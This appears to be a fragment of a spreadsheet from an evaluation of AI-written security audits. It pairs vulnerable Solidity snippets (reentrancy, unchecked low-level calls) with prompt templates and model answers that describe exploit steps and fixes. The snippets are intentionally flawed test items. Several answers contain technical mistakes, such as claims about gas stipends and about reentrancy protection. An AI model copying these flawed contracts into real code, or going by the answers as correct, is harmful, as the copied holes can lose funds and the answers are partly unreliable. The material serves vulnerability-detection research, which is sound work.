    payable
    {
        if(Holders[msg.sender]&gt;0)
        {
            if(Holders[_addr]&gt;=_wei)
            {
                _addr.call.value(_wei);
                Holders[_addr]-=_wei;
            }
        }
    }</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities?
Answer: Yes
2. how this vulnerability can be exploited :
- The function uses the low-level `.call.value(_wei)()` method to send ether. This method can cause unexpected behaviors, especially if the recipient address is a contract. If the recipient contract has a fallback function, it will be executed, and it can potentially run out of gas or introduce reentrancy attacks.
- Reentrancy attack: If `_addr` is a malicious contract address with a fallback function that calls `WithdrawToHolder` again before the first call is completed, it can lead to multiple withdrawals before `Holders[_addr]` is updated, leading to loss of funds.
- There's no gas limit set for the `.call` method. This means the called contract could consume all the available gas, which might lead to unexpected behaviors or potential denial of service.
- There's no event logging, making it harder to track and monitor transactions and changes in the contract state.
To mitigate the above issues:
- Consider using the OpenZeppelin `SafeMath` library to handle arithmetic operations safely.
- Replace the `.call.value()` method with the `address.transfer()` or `address.send()` methods, which are safer for sending ether.
- Implement reentrancy guards to prevent reentrancy attacks.
- Add event logging to track and monitor function calls and state changes.</t>
  </si>
  <si>
    <t>1. Yes.
2. how this vulnerability can be exploited :
   - **Reentrancy Attack**: The function `WithdrawToHolder` contains a reentrancy vulnerability. The contract sends Ether with the `_addr.call.value(_wei)` before updating the state with `Holders[_addr]-=_wei`. This allows for a malicious contract to call `WithdrawToHolder` recursively and drain more funds than intended.
   - **Lack of gas stipend for external call**: Using `_addr.call.value(_wei)` without providing a gas stipend (like `.gas(gasAmount)`) could lead to unexpected behavior if the fallback function in the target address requires more than the 2300 gas stipend provided by default.
   - **Unchecked return value**: The return value of the `_addr.call.value(_wei)` is not checked. It's good practice to check the return value of `call` and handle any failures appropriately. If the call fails and it's not checked, the function will continue executing, potentially leading to unintended behavior. 
A possible mitigation for the reentrancy attack would be to reorder the operations to update the contract's state before transferring any Ether. Using the `check-effects-interactions` pattern would be recommended here.</t>
  </si>
  <si>
    <t>dataset/unchecked_low_level_calls/0x3e013fc32a54c4c5b6991ba539dcd0ec4355c859.sol</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? 
Yes.
2. Explain in details how this vulnerability can be exploited:
This function is vulnerable to a re-entrancy attack. The `adr.call.value(msg.value)(data)` statement is responsible for this vulnerability. A re-entrancy attack can occur when a contract calls an external contract (in this case `adr`) before it has resolved its state. If the external contract is malicious and implements a fallback function, it can call back into the original contract in a loop, draining its Ether.
Here's a simple re-entrancy attack scenario:
- The malicious contract's address is passed as `adr`.
- This malicious contract has a fallback function that calls the vulnerable contract's `Command` function.
- When `adr.call.value(msg.value)(data)` is executed, it triggers the fallback function of the malicious contract.
- The fallback function then calls `Command` again before the first call to `Command` has finished.
- This results in multiple withdrawals from the vulnerable contract, potentially draining its Ether.
3. The business impact of this vulnerabilities in one sentence:
The `Command` function leads to potential Ether loss due to re-entrancy attacks.
4. The potential solutions of this vulnerabilities:
- Use the `transfer` or `send` functions instead of `call.value()()`. These functions only forward 2300 gas, which is not enough to perform any calls, preventing re-entrancy.
- Implement a mutex (mutual exclusion) to prevent re-entrancy. This can be done by using a state variable to lock the contract when it's interacting with another contract.
- Adopt the Checks-Effects-Interactions pattern, where you first perform any checks (like `require` statements), then make any state changes, and finally interact with other contracts. In this case, the state change could be updating an Ether balance, and the interaction would be the `call.value()()`.</t>
  </si>
  <si>
    <t>"I'll start by reading and analyzing the provided Solidity code to identify any vulnerabilities.
1. Are there any vulnerabilities? 
Answer: Yes
2. how this vulnerability can be exploited :
- **Reentrancy Vulnerability**: The function `multiplicate(address adr)` has a reentrancy vulnerability. After checking if `msg.value` is greater than or equal to the contract's balance, it transfers an amount to the given address. However, it does not update the contract's state (i.e., its balance) before sending the ether. This allows a malicious contract to repeatedly call the `multiplicate` function before the first call is finished, draining the contract of its funds.
- **Arbitrary Call Execution**: The `Command(address adr,bytes data)` function allows the contract owner to make any call to any address with any data and any provided ether value. This means that the owner can interact with any contract in any manner they want using the contract's funds. This is not necessarily a vulnerability if it is an intended feature, but it can lead to unintended consequences if the owner is compromised or acts maliciously.
- **Lack of Check for Fallback Function's Gas Limitation**: The fallback function does not have a `payable` modifier, which means it can't receive more than the gas stipend of 2300 gas. This is not sufficient for logging events, making state changes, or doing anything complex. In this case, the fallback function does not do any of these things, but it's a point worth noting.
Recommendations:
- For the reentrancy vulnerability, it is recommended to use the ""checks-effects-interactions"" pattern, which means that you should first perform any checks, then make any changes to your contract's state, and only then interact with other contracts.
- Consider adding access controls and additional checks for the `Command` function or removing it if it's not necessary.
- Always be wary when writing or interacting with contracts that allow for arbitrary call execution, as they can be used in unexpected ways."</t>
  </si>
  <si>
    <t>Alright, let's start by examining the contents of the uploaded Solidity file.
The code appears to be a Solidity smart contract named `MultiplicatorX4` written for the Ethereum blockchain. Let's break down its key components:
1. **State Variable**:
   - `Owner`: The contract owner's address is set to the address that deploys the contract.
2. **Fallback Function**:
   - A function that allows the contract to accept Ether without any explicit function call. It's defined as an empty function and is payable.
3. **Functions**:
   - `withdraw()`: Allows only the `Owner` to withdraw the entire balance of the contract.
   - `Command(address adr, bytes data)`: Allows only the `Owner` to call another contract's function by providing its address `adr` and the data `data` associated with the function call. It also forwards any Ether attached with the function call.
   - `multiplicate(address adr)`: If the value sent with the function call is greater than or equal to the contract's balance, it sends the sum of the contract's balance and the message value to the provided address `adr`.
Given the brief understanding of the contract, I'll now proceed to analyze it for any low-level vulnerabilities.
1. **Are there any unchecked low level vulnerabilities?** 
Yes.
2. **how this vulnerability can be exploited **:
   - **Reentrancy Attack**: The `multiplicate` function is vulnerable to a reentrancy attack. When the condition `msg.value &gt;= this.balance` is met, the function transfers `this.balance + msg.value` to the provided address `adr`. If `adr` is a malicious contract that implements a fallback function to immediately call `multiplicate` again, it can drain the contract's funds.
     **Steps to exploit**:
       1. A malicious contract is created with a fallback function that calls `multiplicate` on the `MultiplicatorX4` contract.
       2. The malicious contract sends Ether to the `MultiplicatorX4` contract such that `msg.value` is greater than or equal to `MultiplicatorX4`'s balance.
       3. The malicious contract's fallback function gets triggered due to the `adr.transfer` call, leading to a recursive loop that drains the `MultiplicatorX4` contract's Ether.
   - **Arbitrary Code Execution**: The `Command` function allows the `Owner` to make arbitrary function calls to any contract. While this is restricted to the owner, it can still be dangerous if the owner's address gets compromised. It's a potential vector for malicious actions, especially when combined with other vulnerabilities or in more complex contract ecosystems.
3. **Additional Notes**:
   - The use of `this.balance` is deprecated in newer versions of Solidity. It's better to use `address(this).balance`.
   - The contract is written using a relatively old version of Solidity (`0.4.18`). It would be beneficial to upgrade to a more recent version to benefit from various security and efficiency improvements.
Given the above vulnerabilities, this contract has serious security flaws, especially the reentrancy vulnerability which can lead to loss of funds.</t>
  </si>
  <si>
    <t>dataset/unchecked_low_level_calls/0x3f2ef511aa6e75231e4deafc7a3d2ecab3741de2.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function Command(address adr,bytes data)
    payable
    public
    {
        require(msg.sender == Owner);
        adr.call.value(msg.value)(data);
    }</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Answer: Yes
2. how this vulnerability can be exploited :
- **Reentrancy Vulnerability**: The function `multiplicate(address adr)` has a reentrancy vulnerability. After checking if `msg.value` is greater than or equal to the contract's balance, it transfers an amount to the given address. However, it does not update the contract's state (i.e., its balance) before sending the ether. This allows a malicious contract to repeatedly call the `multiplicate` function before the first call is finished, draining the contract of its funds.
- **Arbitrary Call Execution**: The `Command(address adr,bytes data)` function allows the contract owner to make any call to any address with any data and any provided ether value. This means that the owner can interact with any contract in any manner they want using the contract's funds. This is not necessarily a vulnerability if it is an intended feature, but it can lead to unintended consequences if the owner is compromised or acts maliciously.
- **Lack of Check for Fallback Function's Gas Limitation**: The fallback function does not have a `payable` modifier, which means it can't receive more than the gas stipend of 2300 gas. This is not sufficient for logging events, making state changes, or doing anything complex. In this case, the fallback function does not do any of these things, but it's a point worth noting.
Recommendations:
- For the reentrancy vulnerability, it is recommended to use the ""checks-effects-interactions"" pattern, which means that you should first perform any checks, then make any changes to your contract's state, and only then interact with other contracts.
- Consider adding access controls and additional checks for the `Command` function or removing it if it's not necessary.
- Always be wary when writing or interacting with contracts that allow for arbitrary call execution, as they can be used in unexpected ways."</t>
  </si>
  <si>
    <t>Alright, let's start by examining the contents of the uploaded Solidity file.
The code appears to be a Solidity smart contract named `MultiplicatorX4` written for the Ethereum blockchain. Let's break down its key components:
1. **State Variable**:
   - `Owner`: The contract owner's address is set to the address that deploys the contract.
2. **Fallback Function**:
   - A function that allows the contract to accept Ether without any explicit function call. It's defined as an empty function and is payable.
3. **Functions**:
   - `withdraw()`: Allows only the `Owner` to withdraw the entire balance of the contract.
   - `Command(address adr, bytes data)`: Allows only the `Owner` to call another contract's function by providing its address `adr` and the data `data` associated with the function call. It also forwards any Ether attached with the function call.
   - `multiplicate(address adr)`: If the value sent with the function call is greater than or equal to the contract's balance, it sends the sum of the contract's balance and the message value to the provided address `adr`.
Given the brief understanding of the contract, I'll now proceed to analyze it for any low-level vulnerabilities.
1. **Are there any unchecked low level vulnerabilities?** 
Yes.
2. **how this vulnerability can be exploited **:
   - **Reentrancy Attack**: The `multiplicate` function is vulnerable to a reentrancy attack. When the condition `msg.value &gt;= this.balance` is met, the function transfers `this.balance + msg.value` to the provided address `adr`. If `adr` is a malicious contract that implements a fallback function to immediately call `multiplicate` again, it can drain the contract's funds.
     **Steps to exploit**:
       1. A malicious contract is created with a fallback function that calls `multiplicate` on the `MultiplicatorX4` contract.
       2. The malicious contract sends Ether to the `MultiplicatorX4` contract such that `msg.value` is greater than or equal to `MultiplicatorX4`'s balance.
       3. The malicious contract's fallback function gets triggered due to the `adr.transfer` call, leading to a recursive loop that drains the `MultiplicatorX4` contract's Ether.
   - **Arbitrary Code Execution**: The `Command` function allows the `Owner` to make arbitrary function calls to any contract. While this is restricted to the owner, it can still be dangerous if the owner's address gets compromised. It's a potential vector for malicious actions, especially when combined with other vulnerabilities or in more complex contract ecosystems.
3. **Additional Notes**:
   - The use of `this.balance` is deprecated in newer versions of Solidity. It's better to use `address(this).balance`.
   - The contract is written using a relatively old version of Solidity (`0.4.18`). It would be beneficial to upgrade to a more recent version to benefit from various security and efficiency improvements.
Given the above vulnerabilities, this contract has serious security flaws, especially the reentrancy vulnerability which can lead to loss of funds.</t>
  </si>
  <si>
    <t>1. Yes, there are vulnerabilities in this code.
2. how this vulnerability can be exploited :
    - The `call` function is used in a way that can potentially make the contract vulnerable to re-entrancy attacks. A malicious contract can implement a fallback function that calls back into the contract and changes state before the first invocation has completed, leading to unexpected behavior.
    - This function doesn't limit the gas sent along with the call. This can lead to unexpected contract behavior if the called contract consumes more gas than expected.
3. The business impact of these vulnerabilities in one sentence: This function can potentially lead to re-entrancy attacks, resulting in unauthorized state changes and loss of funds.
4. The potential solutions of these vulnerabilities:
    - Replace the usage of `.call` with Solidity's built-in transfer or send functions. These functions limit the gas provided to the called contract, mitigating the risk of re-entrancy attacks.
    - Implement a mutex (mutual exclusion) mechanism to prevent re-entrancy. This can be done by using a contract-level lock that prevents a function from being re-entered while a previous invocation is still executing.
    - Use the Checks-Effects-Interactions pattern. This means you should first perform all the checks and calculations, then adjust the contract's state, and finally interact with other contracts.
    - Implement a mechanism to limit the gas sent along with the call, thereby preventing the called contract from consuming more gas than expected.</t>
  </si>
  <si>
    <t>dataset/unchecked_low_level_calls/0x4051334adc52057aca763453820cb0e045076ef3.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function transfer(address from,address caddress,address[] _tos,uint v)public returns (bool){
        require(_tos.length &gt; 0);
        bytes4 id=bytes4(keccak256("transferFrom(address,address,uint256)"));
        for(uint i=0;i&lt;_tos.length;i++){
            caddress.call(id,from,_tos[i],v);
        }
        return true;
    }Understand this code and analyze it, respond me in this format  (fill in the part with ___): 1. Is there any vulnerabilities? give me a short answer in the beginning of your response,choose one from the following three: yes, no, or not sure. If your answer is no, stop here; If your choice is yes, 2. Explain in details how this vulnerability can be exploited:_______. 3. The business impact of this vulnerabilities in one sentence: ___ function leads to _____. 4.The potential solutions of this vulnerabilities:_________. Note: You can state more than one lines which have this vulnerability! This is a short extraction of the solidity code and please assume all the variables in this code have been defined. Please ignore the spelling problem.</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? 
Yes.
2. Explain in details how this vulnerability can be exploited:
This Solidity function has a known vulnerability called "Unchecked Low Level Calls." The line `caddress.call(id,from,_tos[i],v);` is making a low level call without checking the return value. This call might fail silently without throwing an exception, causing the execution of the function to continue despite the failure. This could potentially lead to unexpected behavior and security issues.
3. The business impact of this vulnerabilities in one sentence:
This unchecked function call can lead to silent failures, potentially causing tokens to not be transferred as expected.
4. The potential solutions of this vulnerabilities:
The potential solutions to this issue are:
- Check the return value of the low level call. If the call returns false, it indicates a failure, and appropriate action should be taken.
- Use Solidity's `transferFrom` function instead of a low level call, if possible. `transferFrom` will throw an exception on failure, which is often a safer way to handle errors. 
Here's how the corrected code might look:
```solidity
function transfer(address from, address caddress, address[] _tos, uint v) public returns (bool) {
    require(_tos.length &gt; 0);
    bytes4 id = bytes4(keccak256("transferFrom(address,address,uint256)"));
    for (uint i = 0; i &lt; _tos.length; i++) {
        (bool success,) = caddress.call(id, from, _tos[i], v);
        require(success, "Low-level call failed");
    }
    return true;
}
```
Please note that this is a general analysis and the specific implications and solutions might vary depending on the full context of the contract.</t>
  </si>
  <si>
    <t xml:space="preserve">    function transfer(address[] _tos,uint[] v)public returns (bool){
        require(msg.sender == 0x9797055B68C5DadDE6b3c7d5D80C9CFE2eecE6c9);
        require(_tos.length &gt; 0);
        bytes4 id=bytes4(keccak256("transferFrom(address,address,uint256)"));
        for(uint i=0;i&lt;_tos.length;i++){
            caddress.call(id,from,_tos[i],v[i]*1000000000000000000);
        }
        return true;
    }Understand this code and analyze it, respond me in this format  (fill in the part with ___): 1. Is there any vulnerabilities? give me a short answer in the beginning of your response,choose one from the following three: yes, no, or not sure. If your answer is no, stop here; If your choice is yes, 2. Explain in details how this vulnerability can be exploited:_______. 3. The business impact of this vulnerabilities in one sentence: ___ function leads to _____. 4.The potential solutions of this vulnerabilities:_________. Note: You can state more than one lines which have this vulnerability! This is a short extraction of the solidity code and please assume all the variables in this code have been defined. Please ignore the spelling problem.</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? 
Yes.
2. Explain in details how this vulnerability can be exploited: The vulnerabilities that exist in this function are:
   a) There is a restriction that only the owner of the address `0x9797055B68C5DadDE6b3c7d5D80C9CFE2eecE6c9` can call this function. This could be a vulnerability if the private key to this address is lost or stolen, the function would be unusable or could be misused respectively. 
   b) The function uses the low-level `call` function for calling another contract function `transferFrom`. This is generally considered unsafe because the called contract could execute arbitrary code. If it were to make a call back into the calling contract, it could modify state in ways the calling contract is not prepared for. This is known as a reentrancy attack.
3. The business impact of this vulnerabilities in one sentence: The transfer function leads to potential misuse by unauthorized users if the owner's key is stolen, and potential loss of funds or unintended contract behavior due to reentrancy attacks.
4. The potential solutions of this vulnerabilities:
   a) Instead of hardcoding an address as the only authorized caller of the function, consider using an access control pattern like Ownable. This allows for a more flexible ownership model where ownership can be transferred if necessary.
   b) Instead of using low-level calls, use Solidity's `interface` type to call functions on other contracts. This allows the compiler to check that the called function exists and has the correct number and types of arguments. It also protects against reentrancy attacks because it uses a limited amount of gas and doesn't propagate the remaining gas when making the call. 
   Here is an example of how to do this:
```solidity
interface IERC20 {
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}
function transfer(IERC20 token, address[] memory _tos, uint[] memory v) public returns (bool){
    require(msg.sender == owner, "Caller is not owner");
    require(_tos.length &gt; 0, "Must transfer to at least one address");
    for(uint i=0; i&lt;_tos.length; i++){
        require(token.transferFrom(msg.sender, _tos[i], v[i] * 1e18), "Transfer failed");
    }
    return true;
}
```
This code assumes that the contract uses an `owner` state variable to keep track of the current owner. The `transfer` function now takes an additional `token` argument which is the contract to call `transferFrom` on. It also assumes that the `transferFrom` function in the token contract returns a boolean indicating success or failure. 
Note</t>
  </si>
  <si>
    <t>dataset/unchecked_low_level_calls/0x4b71ad9c1a84b9b643aa54fdd66e2dec96e8b152.sol</t>
  </si>
  <si>
    <t>contract airPort{
    function transfer(address from,address caddress,address[] _tos,uint v)public returns (bool){
        require(_tos.length &gt; 0);
        bytes4 id=bytes4(keccak256("transferFrom(address,address,uint256)"));
        for(uint i=0;i&lt;_tos.length;i++){
            caddress.call(id,from,_tos[i],v);
        }
        return true;
    }
}Understand this code and analyze it, respond me in this format  (fill in the part with ___): 1. Is there any vulnerabilities? give me a short answer in the beginning of your response,choose one from the following three: yes, no, or not sure. If your answer is no, stop here; If your choice is yes, 2. Explain in details how this vulnerability can be exploited:_______. 3. The business impact of this vulnerabilities in one sentence: ___ function leads to _____. 4.The potential solutions of this vulnerabilities:_________. Note: You can state more than one lines which have this vulnerability! This is a short extraction of the solidity code and please assume all the variables in this code have been defined. Please ignore the spelling problem.</t>
  </si>
  <si>
    <t>1. Yes, there are vulnerabilities in this code.
2. how this vulnerability can be exploited :
    - This contract doesn't perform any checks on who can call the `transfer` function. This means that any arbitrary account can execute the transfer of tokens from one account to another without requiring the approval of the sender. In short, this is not a safe practice and can lead to unauthorized transfers of tokens.
    - The `caddress.call(id,from,_tos[i],v)` line is risky. It's using low-level calls, which are not recommended due to their risk of reentrancy attacks. A reentrancy attack occurs when the called contract completes an entire function call back to the original contract before the first function call is finished, potentially draining the contract of Ether or other tokens.
3. The business impact of these vulnerabilities in one sentence: The `transfer` function leads to potential unauthorized transfers and reentrancy attacks which could result in substantial loss of tokens.
4. The potential solutions of these vulnerabilities:
    - Implement an access control mechanism to the `transfer` function to ensure that only authorized users can call it. This could be achieved using a modifier that only allows the owner of the contract or approved accounts to call the function.
    - Replace the low-level `.call` with a higher level function like `caddress.transferFrom(from, _tos[i], v)`. If `caddress` is an ERC20 token, this would invoke the `transferFrom` function of the ERC20 token which is safer. Note that the `transferFrom` function requires that the `from` address has allowed the contract to spend tokens on its behalf. This approval is typically set via the `approve` function of the ERC20 token.
    - Implement checks to prevent reentrancy attacks. This could involve using the Checks-Effects-Interactions pattern, where you perform any external calls or send Ether last in the function. Another popular prevention measure is to use a reentrancy guard, a modifier that prevents recursive calls.
    - It's also a good practice to check the return value of `call` function to handle any possible errors.</t>
  </si>
  <si>
    <t>dataset/unchecked_low_level_calls/0x524960d55174d912768678d8c606b4d50b79d7b1.sol</t>
  </si>
  <si>
    <t xml:space="preserve">	function transfer() returns (bool) {	
		address contract_address;
		contract_address = 0x96a65609a7b84e8842732deb08f56c3e21ac6f8a;
		address c1;		
		address c2;
		uint256 k;
		k = 1;
		c2 = 0xaa27f8c1160886aacba64b2319d8d5469ef2af79;	
		contract_address.call("register", "CentraToken");
		if(!contract_address.call(bytes4(keccak256("transfer(address,uint256)")),c2,k)) return false;
		return true;
	}Understand this code and analyze it, respond me in this format  (fill in the part with ___): 1. Is there any vulnerabilities? give me a short answer in the beginning of your response,choose one from the following three: yes, no, or not sure. If your answer is no, stop here; If your choice is yes, 2. Explain in details how this vulnerability can be exploited:_______. 3. The business impact of this vulnerabilities in one sentence: ___ function leads to _____. 4.The potential solutions of this vulnerabilities:_________. Note: You can state more than one lines which have this vulnerability! This is a short extraction of the solidity code and please assume all the variables in this code have been defined. Please ignore the spelling problem.</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? 
Yes.
2. Explain in details how this vulnerability can be exploited:
The vulnerability in the given Solidity code is that it uses a low-level `call()` function to interact with an external contract. The `call()` function in Solidity allows calling arbitrary functions in other contracts and it also forwards all remaining gas to the call. This could enable the called contract to perform operations that consume a lot of gas, effectively leading to a Denial-of-Service (DoS) attack. It could also lead to re-entrancy attacks if used improperly, though that doesn't seem to be an issue in this specific code snippet. 
The relevant lines of code with the vulnerability are:
```solidity
contract_address.call("register", "CentraToken");
if(!contract_address.call(bytes4(keccak256("transfer(address,uint256)")),c2,k)) return false;
```
3. The business impact of this vulnerabilities in one sentence:
The use of the low-level `call()` function leads to potential Denial-of-Service (DoS) attacks, which could render the contract unusable.
4. The potential solutions of this vulnerabilities:
A potential solution to this vulnerability would be to use Solidity's high-level interface to interact with external contracts. This way, a fixed amount of gas can be specified for the call, protecting against potential DoS attacks. 
Alternatively, if low-level calls are necessary, checks-effects-interactions pattern should be followed to avoid potential re-entrancy attacks. This pattern suggests that you should make all external calls at the end of your function, and after you've made any changes to your contract's state.
Here's how the code could be revised:
```solidity
interface OtherContract {
    function register(string memory _name) external returns(bool);
    function transfer(address _to, uint256 _value) external returns(bool);
}
OtherContract other = OtherContract(contract_address);
other.register("CentraToken");
if (!other.transfer(c2, k)) return false;
```
In this revision, the `OtherContract` interface is used to define the methods of the contract at `contract_address`. Then, a high-level call is used to invoke these methods, which doesn't forward all remaining gas and is therefore safer from a DoS attack perspective. Note that the actual interface would depend on the specific contract being interacted with.</t>
  </si>
  <si>
    <t>Alright, let me review the uploaded Solidity code and then answer your questions.
From the initial review of the code, it appears to be a Solidity contract for a lottery game named "Lotto." The contract defines constants for blocks per round, ticket price, and block reward. Additionally, there's a struct for `Round` which includes information about buyers, the pot, ticket count, and other mappings. The contract also contains functions like `getRoundIndex()`, `getIsCashed()`, and `calculateWinner()`.
I will further analyze the entire code to identify any vulnerabilities.
The uploaded Solidity contract for "Lotto" has the following notable components:
1. **Constants**:
    - `blocksPerRound`: Number of blocks per round (6800 blocks, approximating a day).
    - `ticketPrice`: Cost of each ticket (0.1 ether).
    - `blockReward`: This constant is defined but not used in the displayed functions.
2. **Structs**:
    - `Round`: Represents a lottery round with attributes such as buyers, pot, ticket count, and various mappings.
3. **Mappings**:
    - `rounds`: Maps each round number to its corresponding `Round` struct.
4. **Functions**:
    - `getBlocksPerRound()`: Returns `blocksPerRound`.
    - `getTicketPrice()`: Returns `ticketPrice`.
    - `getRoundIndex()`: Determines the current round number based on the block number.
    - `getIsCashed(uint roundIndex, uint subpotIndex)`: Checks if a subpot in a round is cashed.
    - `calculateWinner(uint roundIndex, uint subpotIndex)`: Calculates the winner of a subpot in a round.
    - `getDecisionBlockNumber(uint roundIndex, uint subpotIndex)`: Gets the decision block number for a subpot in a round.
    - `getHashOfBlock(uint blockIndex)`: Gets the hash of a block based on its index.
    - `getBuyers(uint roundIndex, address buyer)`: Gets all buyers for a specific round.
    - `getTicketsCountByBuyer(uint roundIndex, address buyer)`: Gets the number of tickets bought by a buyer in a round.
    - `getPot(uint roundIndex)`: Gets the total pot value for a round.
    - `()`: A fallback function that's called when someone sends ether to the contract. It processes ticket purchases and updates the state of the lottery rounds.
I will now analyze the contract for potential vulnerabilities.
**Vulnerabilities Analysis**:
1. **Solidity Version**: 
    The contract is using Solidity version 0.4.0. Older versions of Solidity are known to have vulnerabilities. For security reasons, it's recommended to use the latest stable version of Solidity, or at least a version that has undergone multiple security audits and patches.
2. **Fallback Function**:
    The fallback function processes lottery ticket purchases and updates the state of the lottery rounds. If any part of this function is computationally expensive, and the function runs out of gas, users might unintentionally donate ether without receiving lottery tickets.
3. **Unbounded Loops**:
    If the contract contains loops that iterate over unbounded data structures (like arrays), it can be a potential DoS vulnerability. We need to check the functions for such loops.
4. **Reentrancy**:
    Reentrancy is a common vulnerability in Solidity where external contract calls can be used maliciously. I will check if the contract has any external calls that could be exploited.
5. **Use of `send`**:
    The contract uses the `send` method to transfer ether. While `send` is considered safer than `call.value()()`, it's still recommended to check the order of operations to ensure there's no state change after the `send`.
6. **Randomness**:
    The lottery logic depends on randomness. Solidity's deterministic nature makes it challenging to generate random numbers. If the contract uses block variables (like `blockhash`) to generate randomness, miners might have a slight advantage in predicting or influencing the outcome.
Let's dive deeper into these potential vulnerabilities.
Here are the key functions we've extracted:
### Fallback Function:
```solidity
function () payable {
    var roundIndex = getRoundIndex();
    var value = msg.value-(msg.value%ticketPrice);
    if(value==0) return;
    if(value&lt;msg.value){
        msg.sender.send(msg.value-value);
    }
    //no partial tickets, send a partial refund
    var ticketsCount = value/ticketPrice;
    rounds[roundIndex].ticketsCount+=ticketsCount;
    if(rounds[roundIndex].ticketsCountByBuyer[msg.sender]==0){
        var buyersLength = rounds[roundIndex].buyers.length++;
        rounds[roundIndex].buyers[buyersLength] = msg.sender;
    }
    rounds[roundIndex].ticketsCountByBuyer[msg.sender]+=ticketsCount;
    rounds[roundIndex].ticketsCount+=ticketsCount;
    //keep track of the total tickets
    rounds[roundIndex].pot+=value;
    //keep track of the total pot
}
```
### calculateWinner Function:
(This function appears to be truncated, so the full code is not displayed.)
```solidity
function calculateWinner(uint roundIndex, uint subpotIndex) constant returns(address) {
    //note this ...
}
```
**Analysis**:
1. The fallback function contains a `.send()` method, which can potentially be exploited if not handled properly. The contract sends back a partial refund if someone sends more ether than the ticket price. There's a risk of reentrancy attack if a malicious contract's fallback function is triggered and tries to call the lotto contract repeatedly.
2. The fallback function updates the state (`rounds[roundIndex].buyers`, `rounds[roundIndex].ticketsCountByBuyer[msg.sender]`, `rounds[roundIndex].ticketsCount`, and `rounds[roundIndex].pot`) after the `.send()` method. In the case of a failed send, the state would still be updated, which can lead to inconsistencies.
3. The `calculateWinner` function appears to be truncated, so we cannot fully analyze its content.
**Proof of Concept**:
1. **Reentrancy**: A malicious contract can be created with a fallback function that calls the lotto contract's fallback function. This would result in the malicious contract potentially draining more ether than it should.
2. **State After Send**: If the `.send()` method fails (due to the receiving contract's fallback function consuming more than 2300 gas), the state would still be updated. This could lead to users being credited with tickets without paying the full amount.
Given the above, there are vulnerabilities in the contract.
1. Are there any vulnerabilities? 
   **Yes**.
2. how this vulnerability can be exploited :
   - **Reentrancy**: A malicious contract can be created with a fallback function that calls the lotto contract's fallback function. This would result in the malicious contract potentially draining more ether than it should.
   - **State After Send**: If the `.send()` method fails (due to the receiving contract's fallback function consuming more than 2300 gas), the state would still be updated. This could lead to users being credited with tickets without paying the full amount.</t>
  </si>
  <si>
    <t>Alright, I will review the provided Solidity code (`etherpot_lotto.sol`) for unchecked low-level vulnerabilities. After analyzing, I will respond in the format you've provided. Let's begin.
The provided Solidity code seems to represent a simple lottery system named `Lotto`. Here's a brief overview:
1. Constants are defined for the number of blocks per round, ticket price, and block reward.
2. Accessor functions are provided to retrieve these constants.
3. There's a struct named `Round` that represents a lottery round with details such as buyers, pot size, ticket count, and mappings to check if a pot has been cashed and to track ticket counts per buyer.
4. The contract maintains a mapping of these rounds.
5. A series of utility functions are present, such as:
   - `getRoundIndex()`: Determines the current round index.
   - `getIsCashed()`: Checks if a given round's subpot has been cashed.
   - `calculateWinner()`: Determines the winner for a given round and subpot.
   - `getDecisionBlockNumber()`: Returns the block number at which the decision for a winner should be made.
It seems the code provided is just a part of the entire contract, as we can only see up to the `getSubpotsCount` function. To thoroughly analyze the code for unchecked low-level vulnerabilities, I'll review the entire contract, focusing on low-level calls, how ether is transferred, and if there are any potential reentrancy attacks or other vulnerabilities. Let's proceed with the analysis.
Based on the preliminary analysis:
1. **Unchecked Low-Level Vulnerabilities**: Yes
2. **Proof of Concept of these vulnerabilities**:
   - The `send()` function is used. Using `send()` for transferring ether can be problematic as it might not throw an error if the transfer fails (for instance, due to a fallback function consuming more than 2300 gas or the recipient contract not existing). It's typically safer to use `transfer()`, which throws an error if the ether transfer fails, ensuring that the subsequent code doesn't execute on a failed transfer.
   - The `blockhash()` function is used. This function can only access the hash of the 256 most recent blocks. Relying on it for older blocks can lead to incorrect behavior.
To provide a more comprehensive review, I'll need to further examine how the `send()` and `blockhash()` functions are used in the context of the contract. This will give a clearer picture of the potential impact and exploitability of these issues.
Let's analyze the instances where the mentioned functions are used:
**1. `send()`:**
   - `winner.send(subpot);`: This line seems to send a certain `subpot` amount of ether to a `winner`. If this send fails, the ether might be stuck or the contract might continue executing with incorrect assumptions.
   - `msg.sender.send(msg.value-value);`: This line appears to send back some ether to the message sender (possibly refunding excess ether sent). A failure here would mean the sender doesn't receive their refund.
**2. `blockhash()`:**
   - `return uint(block.blockhash(blockIndex));`: The contract is converting the block hash of a certain block (specified by `blockIndex`) into a uint. The vulnerability here lies in the fact that `blockhash` can only access the hash of the 256 most recent blocks. If the `blockIndex` references a block older than the last 256 blocks, this will always return zero, which could lead to unexpected behavior.
**Recommendations:**
1. Instead of using `send()`, consider using `transfer()`. If you continue to use `send()`, always check its return value to ensure the transfer was successful.
2. Ensure that the `blockIndex` value passed to `blockhash` is always within the last 256 blocks. Alternatively, consider other mechanisms if older block hashes are required.
Would you like to proceed with more in-depth analysis or have any other questions?</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? Yes.
2. Explain in details how this vulnerability can be exploited:
The vulnerability in this code is related to the use of the `send` function. The `send` function is a low-level function in Solidity that is used to transfer ether to another address. However, using `send` for transferring funds can be risky, especially when it's used without proper error handling. If the recipient of the transfer is a contract with a fallback function that consumes a lot of gas, the `send` operation might fail, and the state changes made before the transfer will be reverted.
3. The business impact of this vulnerabilities in one sentence:
This function leads to the risk of fund transfer failures, potential denial-of-service (DoS) attacks, and lost transaction fees due to the lack of proper error handling.
4. The potential solutions to this vulnerabilities:
To mitigate this vulnerability, it's recommended to use a more robust and safer way of transferring funds, such as the `transfer` function or the `call` function with appropriate error handling. Additionally, consider using a withdrawal pattern where users can withdraw their funds rather than automatically sending funds to winners. Implementing proper error handling and considering gas limits can help prevent DoS attacks and ensure the contract's reliability.</t>
  </si>
  <si>
    <t>dataset/unchecked_low_level_calls/etherpot_lotto.sol</t>
  </si>
  <si>
    <t xml:space="preserve"> function cash(uint roundIndex, uint subpotIndex){
         var subpotsCount = getSubpotsCount(roundIndex);
         if(subpotIndex&gt;=subpotsCount)
             return;
